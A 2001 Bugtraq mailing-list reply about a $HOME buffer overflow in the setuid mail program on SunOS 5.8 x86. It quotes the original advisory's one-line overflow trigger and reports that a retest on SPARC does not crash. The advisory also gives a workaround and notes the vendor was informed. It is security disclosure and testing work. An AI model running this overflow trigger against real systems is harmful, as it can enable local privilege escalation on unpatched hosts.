[20861] in bugtraq
Re: $HOME buffer overflow in SunOS 5.8 x86
daemon@ATHENA.MIT.EDU (Juergen P. Meier)
Tue Jun 5 14:19:49 2001
Date: Tue, 5 Jun 2001 15:33:05 +0200
From: "Juergen P. Meier" <jpm@class.de>
To: Georgi Guninski <guninski@guninski.com>
Cc: Bugtraq <BUGTRAQ@securityfocus.com>
Message-ID: <20010605153305.A24252@fm.rz.fh-muenchen.de>
Reply-To: jpm@class.de
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3B1BA5D6.1C8D0055@guninski.com>; from guninski@guninski.com on Mon, Jun 04, 2001 at 06:14:30PM +0300
On Mon, Jun 04, 2001 at 06:14:30PM +0300, Georgi Guninski wrote:
> $HOME buffer overflow in SunOS 5.8 x86
> Systems affected:
> SunOS 5.8 x86 have not tested on other OSes
> Risk: Medium
> Date: 4 June 2001
>
> Details:
> HOME=`perl -e 'print "A"x1100'` ; export HOME
> mail a
> CTL-C
> eip gets smashed with 0x41414141.
0:jpmeier@sol:~> HOME=`perl -e 'print "A"x1100'` ; export HOME
0:jpmeier@sol:/home/jpmeier> mail a
^Cmail: Mail saved in dead.letter
1:jpmeier@sol:/home/jpmeier> uname -a
SunOS sol 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-5_10
also tried larger buffers.
Solaris/sparc appears not vulnerable. Maybe its an x86 bug only
> Workaround:
> chmod -s /usr/bin/mail
> Vendor status:
> Sun was informed on 29 May 2001 about /usr/bin/mail and shall release patches.
juergen
--
Juergen P. Meier email: jpm@class.de
